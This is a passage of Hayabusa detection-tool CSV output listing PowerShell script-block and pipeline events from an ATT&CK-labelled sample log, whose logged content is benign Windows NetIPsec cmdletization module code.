PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx +2021-04-22 10:19:38.782 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.782 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.807 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 
$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.807 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.808 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.808 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } 